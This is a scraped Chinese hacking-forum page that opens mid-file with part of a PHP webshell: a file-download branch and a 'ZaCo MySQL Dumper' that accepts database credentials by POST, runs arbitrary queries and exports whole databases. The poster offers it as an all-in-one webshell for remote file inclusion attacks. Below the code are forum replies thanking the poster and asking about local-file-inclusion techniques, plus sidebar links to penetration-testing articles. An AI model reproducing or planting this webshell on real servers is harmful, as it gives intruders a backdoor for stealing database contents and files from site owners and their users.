filename="'.str_replace('/','-',$fname)."\n\n"); ob_start(); while(feof($f)===false) { echo(fread($f,10000)); ob_flush(); } } } } } break; } case 'mysql' : { $action=isset($_POST['action'])?$_POST['action']:'query'; $user=isset($_POST['user'])?$_POST['user']:''; $passwd=isset($_POST['passwd'])?$_POST['passwd']:''; $db=isset($_POST['db'])?$_POST['db']:''; $host=isset($_POST['host'])?$_POST['host']:'localhost'; $query=isset($_POST['query'])?magic_q($_POST['query']):''; switch($action) { case 'dump' : { $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; $archive=isset($_POST['archive'])?$_POST['archive']:'none'; if($archive!=='none')$to_file=false; $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); else { $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; ob_start(); if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; if($table_dump=='') { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $result=mysql_query('show tables',$mysql_link); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); if(!$result2)$dump_file.='#error table '.$rows[0]; else { $dump_file.='create table `'.$rows[0]."`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); $columns=$j; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$rows[0].'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); } } mysql_free_result($result); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo($dump_file); } else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } else { $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); if(!$result2)echo('error table '.$table_dump); else { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } if($to_file===false) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $dump_file.="create table `{$table_dump}`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); $columns=$j; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$table_dump.'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo $dump_file; }else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } } } } break; } case 'query' : { echo($head.$pages); ?> <hr> <form method=post> <table> <td> <table align=left> <tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr> <tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr> </table> </td> <td> <table> <tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr> <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <tr><td><input type=submit name='action' value='dump'></td></tr> <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> </table> </td> </table> <input name='page' value='mysql' type=hidden> <input name='action' value='query' type=submit> </form> <hr> <? $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $result=@mysql_query($query,$mysql_link); if(!($result))echo(mysql_error()); else if(@mysql_num_fields($result)) { echo("<table valign=top align=left>\n<tr>"); for($i=0;$i<mysql_num_fields($result);$i++) echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); echo("\n</tr>\n"); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); echo('<tr valign=top align=left>'); for($j=0;$j<mysql_num_fields($result);$j++) { echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); } echo("</tr>\n"); } echo("</table>\n"); } mysql_close($mysql_link); } break; } } break; } } ?>

最近大家都对远程包含挺关注的分享一个远程包含专用的webshell 不必那么麻烦所有功能一个webshell完成

回复|@ta|踩(0)|顶(0)

10楼

lazze
2011-6-17 11:06

不错，好东西，看LZ最近分享的都挺不错的。

回复|@ta|踩(0)|顶(0)
9楼

xhming
2011-6-17 10:17

虽然是很老的东西了，但还是值得顶下

回复|@ta|踩(0)|顶(0)
8楼

uuwhat
2011-6-17 10:05

我这个盲被你扫了

回复|@ta|踩(0)|顶(0)
7楼

ninty
2011-6-17 09:43

第五个方法是怎么包含的？

回复|@ta|踩(0)|顶(0)
6楼

icerain
2011-6-17 09:15

收藏下

回复|@ta|踩(0)|顶(0)
5楼

istice
2011-6-17 08:52

是不是 3.日志包含log日志文件包涵到仍要截断

回复|@ta|踩(0)|顶(0)
4楼

darkmoon
2011-6-17 00:10

不错丫顶个丫

回复|@ta|踩(0)|顶(0)
3楼

h4cker
2011-6-17 00:09

学xi了，谢谢分享

回复|@ta|踩(0)|顶(0)
2楼

mstsc123
2011-6-17 00:00

学xi到不少支持下

回复|@ta|踩(0)|顶(0)
1楼

Knife
2011-6-16 23:27

不错，顶一下

回复|@ta|踩(0)|顶(0)

PHP安全之LFI漏洞GetShell方法大阅兵

关于作者

评论19次

mark

这是LFI的GetShell方法··· 最近正蛋疼遇到，log文件过大，包含利用不成功。

多谢，那个环境变量的利用懂了：P

学xi了，果然是好文章啊。。。

真的很不错。学xi了

你详细看下http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf 这个文档，有说明。具体我没有实战过不好说。很多时候是最后一种方法比较有效。

LZ写的很详细.赞一个

马克

不错，好东西，看LZ最近分享的都挺不错的。

虽然是很老的东西了，但还是值得顶下

我这个盲被你扫了

第五个方法是怎么包含的？

收藏下

是不是 3.日志包含log日志文件 包涵到 仍要截断

不错丫 顶个丫

学xi了，谢谢分享

学xi到不少 支持下

不错，顶一下

热门文章

渗透测试[已重新编辑]AI与基础安全结合的新的攻击面

渗透测试真实学院渗透思路分享

安全资讯XZ Utils 库中发现秘密后门，影响主要的 Linux 发行版

安全资讯号外号外！大家一定来看看！GitHub 骗局诱骗开发人员下载恶意软件

社会工程小世界找联系方式之拓展思路

最新回复

精华推荐

渗透测试从PDO下的注入思路到Git 3000star项目0day

渗透测试T00LS Metasploit系列教程（第二季)

逆向破解微信PC端技术研究(2)-拿下聊天语音

渗透测试渗透某大型菠菜网站

渗透测试CVE-2017-7269的几个技巧及BUG修正

是不是 3.日志包含log日志文件包涵到仍要截断

不错丫顶个丫

学xi到不少支持下